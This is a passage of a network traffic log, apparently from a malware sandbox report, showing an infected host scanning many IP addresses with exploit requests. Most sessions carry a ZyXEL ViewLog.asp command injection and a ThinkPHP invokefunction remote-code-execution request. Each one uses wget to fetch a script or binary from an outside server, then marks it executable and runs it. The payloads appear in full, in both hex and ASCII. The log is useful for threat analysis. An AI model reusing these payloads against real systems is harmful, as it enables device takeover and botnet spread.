73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-famil

Session ID	Source IP	Source Port	Destination IP	Destination Port
218	192.168.2.23	42012	94.130.205.212	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:31.699911118 CET	5080	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:31.891777039 CET	5087	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 741 Date: Wed, 22 Nov 2023 07:38:31 GMT Keep-Alive: timeout=20 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 33 31 20 28 44 65 62 69 61 6e 29 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> /cgi-bin/ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.31 (Debian)</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
219	192.168.2.23	41112	85.95.112.176	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:31.700125933 CET	5081	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:31.888993979 CET	5085	IN	HTTP/1.0 404 Not Found !!! Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Content-type: text/html <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html> Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
220	192.168.2.23	50990	62.29.67.97	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:31.731831074 CET	5082	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
221	192.168.2.23	39302	94.122.58.42	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:31.732386112 CET	5082	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
222	192.168.2.23	40736	95.179.141.3	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:32.414155960 CET	5118	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:32.590985060 CET	5123	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:32 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
223	192.168.2.23	60906	95.100.66.163	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:32.414787054 CET	5119	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:32.594507933 CET	5124	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:38:32 GMT Date: Wed, 22 Nov 2023 07:38:32 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 62 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 30 36 33 38 37 31 32 26 23 34 36 3b 31 65 65 39 39 39 66 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.bb7a7b5c.1700638712.1ee999f9</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
224	192.168.2.23	58242	95.100.139.78	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:32.451422930 CET	5120	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:32.667052031 CET	5126	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:38:32 GMT Date: Wed, 22 Nov 2023 07:38:32 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 36 38 36 62 61 35 64 26 23 34 36 3b 31 37 30 30 36 33 38 37 31 32 26 23 34 36 3b 39 35 66 65 62 35 62 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.d686ba5d.1700638712.95feb5b5</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
225	192.168.2.23	36238	95.83.109.244	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:32.462168932 CET	5120	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:32.710105896 CET	5127	IN	HTTP/1.1 400 Bad Request Data Raw: 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 Data Ascii: 400 Bad request

Session ID	Source IP	Source Port	Destination IP	Destination Port
226	192.168.2.23	41578	95.86.103.208	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:32.471724987 CET	5121	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
227	192.168.2.23	56916	95.56.77.66	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:32.495162964 CET	5122	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:32.755646944 CET	5141	IN	HTTP/1.1 200 OK
Nov 22, 2023 08:38:32.755750895 CET	5142	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
228	192.168.2.23	43332	88.224.58.59	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:32.735193014 CET	5128	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:33.046330929 CET	5218	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain Content-Length: 371 Connection: close
Nov 22, 2023 08:38:33.050080061 CET	5219	IN	Data Raw: 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 0a 43 61 6e 6e 6f 74 20 70 61 72 73 65 20 48 54 54 50 20 72 65 71 75 65 73 74 3a 20 5b 47 45 54 20 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 Data Ascii: Error 400: Bad RequestCannot parse HTTP request: [GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp Thin

Session ID	Source IP	Source Port	Destination IP	Destination Port
229	192.168.2.23	57770	88.221.225.159	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:32.852133989 CET	5154	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:33.044020891 CET	5217	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:38:32 GMT Date: Wed, 22 Nov 2023 07:38:32 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 62 30 63 31 35 30 32 26 23 34 36 3b 31 37 30 30 36 33 38 37 31 32 26 23 34 36 3b 33 36 65 39 31 61 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.9b0c1502.1700638712.36e91a5</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
230	192.168.2.23	59256	88.221.224.61	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:32.852611065 CET	5154	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:33.044794083 CET	5218	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:38:32 GMT Date: Wed, 22 Nov 2023 07:38:32 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 35 30 63 31 35 30 32 26 23 34 36 3b 31 37 30 30 36 33 38 37 31 32 26 23 34 36 3b 31 31 65 34 36 66 33 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.950c1502.1700638712.11e46f37</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
231	192.168.2.23	44962	94.121.152.174	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:34.202646971 CET	5331	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
232	192.168.2.23	58348	62.29.11.42	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:34.202800035 CET	5332	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
233	192.168.2.23	36766	94.120.174.57	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:34.205585003 CET	5332	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
234	192.168.2.23	55266	85.209.161.89	8080

Timestamp	kBytes transferred	Direction	Data
